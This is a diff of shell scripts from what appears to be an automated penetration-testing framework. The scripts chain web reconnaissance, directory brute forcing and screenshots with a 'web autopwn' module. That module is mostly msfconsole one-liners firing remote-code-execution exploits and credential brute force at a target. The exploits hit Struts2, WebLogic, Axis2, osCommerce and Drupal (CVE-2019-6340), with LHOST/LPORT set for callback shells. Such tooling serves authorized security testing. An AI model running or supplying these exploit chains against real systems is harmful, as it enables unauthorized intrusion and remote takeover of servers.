mv -f *_ips.txt $LOOT_DIR/domains/ 2>/dev/null
|
||||
|
||||
|
|
@ -154,6 +158,7 @@ if [ "$MODE" = "stealth" ]; then
|
|||
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 5 -I -s -R http://$TARGET | tee $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -s -R -L http://$TARGET > $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 5 -I -s -R -X OPTIONS http://$TARGET | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port80.txt 2> /dev/null
|
||||
if [ "$WEBTECH" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET"
|
||||
|
|
@ -204,28 +209,40 @@ if [ "$MODE" = "stealth" ]; then
|
|||
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
fi
|
||||
if [ "$WEB_BRUTE" == "1" ]; then
|
||||
if [ "$WEB_BRUTE_STEALTHSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_STEALTH -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm $RESET"
|
||||
fi
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_STEALTH -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
if [ "$DIRSEARCH" == "1" ]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_STEALTH -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$GOBUSTER" == "1" ]; then
|
||||
gobuster -u http://$TARGET -w $WEB_BRUTE_STEALTH -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-stealth.txt
|
||||
sort -u $LOOT_DIR/web/webbrute-$TARGET-*.txt 2> /dev/null > $LOOT_DIR/web/webbrute-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
wget http://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-http.txt 2> /dev/null
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ ${DISTRO} == "blackarch" ]; then
|
||||
/bin/CutyCapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
else
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN cutycapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null$RESET"
|
||||
if [ $CUTYCAPT = "1" ]; then
|
||||
if [ ${DISTRO} == "blackarch" ]; then
|
||||
/bin/CutyCapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
else
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN cutycapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null$RESET"
|
||||
fi
|
||||
cutycapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
fi
|
||||
cutycapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
fi
|
||||
if [ $WEBSCREENSHOT = "1" ]; then
|
||||
cd $LOOT_DIR
|
||||
python $INSTALL_DIR/bin/webscreenshot.py -t 5 http://$TARGET:80
|
||||
fi
|
||||
fi
|
||||
|
||||
|
|
@ -265,6 +282,7 @@ if [ "$MODE" = "stealth" ]; then
|
|||
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 5 -I -s -R https://$TARGET | tee $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -s -R -L https://$TARGET > $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 5 -I -s -R -X OPTIONS https://$TARGET | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port443.txt 2> /dev/null
|
||||
if [ "$WEBTECH" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET"
|
||||
|
|
@ -292,9 +310,8 @@ if [ "$MODE" = "stealth" ]; then
|
|||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null$RESET"
|
||||
fi
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
|
||||
if [ "$BLACKWIDOW" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER $RESET"
|
||||
|
|
@ -303,7 +320,9 @@ if [ "$MODE" = "stealth" ]; then
|
|||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN blackwidow -u https://$TARGET:443 -l 3$RESET"
|
||||
fi
|
||||
blackwidow -u https://$TARGET:443 -l 2 -v n
|
||||
cat /usr/share/blackwidow/$TARGET*/* >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat /usr/share/blackwidow/$TARGET*/* > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
fi
|
||||
if [ $WEB_BRUTE_STEALTHSCAN == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
|
|
@ -312,9 +331,15 @@ if [ "$MODE" = "stealth" ]; then
|
|||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_STEALTH -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm $RESET"
|
||||
fi
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_STEALTH -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
if [ "$DIRSEARCH" == "1" ]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_STEALTH -x 400,403,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$GOBUSTER" == "1" ]; then
|
||||
gobuster -u https://$TARGET -w $WEB_BRUTE_STEALTH -e | tee $LOOT_DIR/web/webbrute-$TARGET-https-stealth.txt
|
||||
sort -u $LOOT_DIR/web/webbrute-$TARGET-*.txt 2> /dev/null > $LOOT_DIR/web/webbrute-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN wget https://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-https.txt 2> /dev/null$RESET"
|
||||
fi
|
||||
|
|
@ -334,13 +359,20 @@ if [ "$MODE" = "stealth" ]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ ${DISTRO} == "blackarch" ]; then
|
||||
/bin/CutyCapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
else
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN cutycapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null$RESET"
|
||||
if [ $CUTYCAPT = "1" ]; then
|
||||
if [ ${DISTRO} == "blackarch" ]; then
|
||||
/bin/CutyCapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
else
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN cutycapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null$RESET"
|
||||
fi
|
||||
cutycapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
fi
|
||||
cutycapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
fi
|
||||
|
||||
if [ $WEBSCREENSHOT = "1" ]; then
|
||||
cd $LOOT_DIR
|
||||
python $INSTALL_DIR/bin/webscreenshot.py -t 5 https://$TARGET:443
|
||||
fi
|
||||
echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port443.jpg"
|
||||
fi
|
||||
|
|
@ -368,5 +400,8 @@ if [ "$MODE" = "stealth" ]; then
|
|||
if [ "$LOOT" = "1" ]; then
|
||||
loot
|
||||
fi
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Scan completed: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
exit
|
||||
fi
|
||||
|
|
@ -14,8 +14,12 @@ if [ "$MODE" = "web" ]; then
|
|||
mkdir $LOOT_DIR/scans 2> /dev/null
|
||||
mkdir $LOOT_DIR/output 2> /dev/null
|
||||
fi
|
||||
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
|
||||
sniper -t $TARGET -m $MODE --noreport $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Starting scan: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
sniper -t $TARGET -m $MODE --noreport $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
exit
|
||||
fi
|
||||
fi
|
||||
fi
|
||||
|
|
|
|||
|
|
@ -1,3 +1,6 @@
|
|||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Running web autopwn: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
|
|
@ -37,7 +40,7 @@
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING JENKINS ENUMERATION $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use scanner/http/jenkins_enum; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; set TARGETURI /; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.raw
|
||||
msfconsole -q -x "use scanner/http/jenkins_enum; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; set TARGETURI /; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
|
|
@ -100,6 +103,40 @@
|
|||
msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg RHOST "$TARGET"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/htp/phpmyadmin_preg_replace; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw 2> /dev/null
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING AXIS2 ADMIN BRUTE FORCE SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use scanner/http/axis_login; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg RHOST "$TARGET"; setg USERNAME admin; setg PASS_FILE "$PASS_FILE"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-axis_login.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-axis_login.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-axis_login.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-axis_login.raw 2> /dev/null
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING AXIS2 AUTHENTICATED DEPLOYER RCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use multi/http/axis2_deployer; setg RHOSTS "$TARGET"; set FingerprintCheck false; setg RPORT "$PORT"; setg RHOST "$TARGET"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-axis2_deployer.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-axis2_deployer.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-axis2_deployer.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-axis2_deployer.raw 2> /dev/null
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT CVE-2017-8917 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
|
|
@ -121,19 +158,19 @@
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS JAKARTA OGNL INJECTION CVE-2017-5638 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use multi/http/struts2_content_type_ognl; setg RHOST "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw
|
||||
msfconsole -q -x "use multi/http/struts2_content_type_ognl; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; set TARGETURI /orders/3; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 SHOWCASE OGNL RCE CVE-2017-9805 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/struts2_rest_xstream; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw
|
||||
msfconsole -q -x "use exploit/multi/http/struts2_rest_xstream; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; set TARGETURI /orders/3; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 REST XSTREAM RCE CVE-2017-9791 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/struts2_code_exec_showcase; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw
|
||||
msfconsole -q -x "use exploit/multi/http/struts2_code_exec_showcase; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; set TARGETURI /orders/3; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
|
|
@ -163,7 +200,7 @@
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING ORACLE WEBLOGIC SERVER DESERIALIZATION RCE CVE-2018-2628 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/misc/weblogic_deserialize; setg RHOST "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw
|
||||
msfconsole -q -x "use exploit/multi/misc/weblogic_deserialize; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
|
|
@ -171,4 +208,14 @@
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/oscommerce_installer_unauth_code_exec; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING DRUPAL REST UNSERIALIZE CVE-2019-6340 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use unix/webapp/drupal_restws_unserialize; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; setg URI /drupal/; setg TARGETURI /drupal/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.raw 2> /dev/null
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Finished web autopwn: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
|
||||
|
|
@ -14,8 +14,12 @@ if [ "$MODE" = "webporthttp" ]; then
|
|||
mkdir $LOOT_DIR/scans 2> /dev/null
|
||||
mkdir $LOOT_DIR/output 2> /dev/null
|
||||
fi
|
||||
echo "$TARGET $MODE port$PORT `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
echo "sniper -t $TARGET -m $MODE -p $PORT --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
|
||||
sniper -t $TARGET -m $MODE -p $PORT --noreport $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-$PORT-`date +%Y%m%d%H%M`.txt 2>&1
|
||||
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
|
||||
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "Starting scan: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
sniper -t $TARGET -m $MODE -p $PORT --noreport $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-$PORT-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
exit
|
||||
fi
|
||||
echo -e "$OKRED ____ $RESET"
|
||||
|
|
@ -101,6 +105,7 @@ if [ "$MODE" = "webporthttp" ]; then
|
|||
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 http://$TARGET:$PORT | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET-$PORT.txt 2> /dev/null
|
||||
curl --connect-timeout 3 -I -s -R http://$TARGET:$PORT | tee $LOOT_DIR/web/headers-http-$TARGET-$PORT.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -I -s -R -L http://$TARGET:$PORT | tee $LOOT_DIR/web/websource-http-$TARGET-$PORT.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 5 -I -s -R -X OPTIONS http://$TARGET:$PORT | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port$PORT.txt 2> /dev/null
|
||||
if [ "$WEBTECH" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET"
|
||||
|
|
@ -122,11 +127,16 @@ if [ "$MODE" = "webporthttp" ]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port$PORT.jpg"
|
||||
if [ ${DISTRO} == "blackarch" ]; then
|
||||
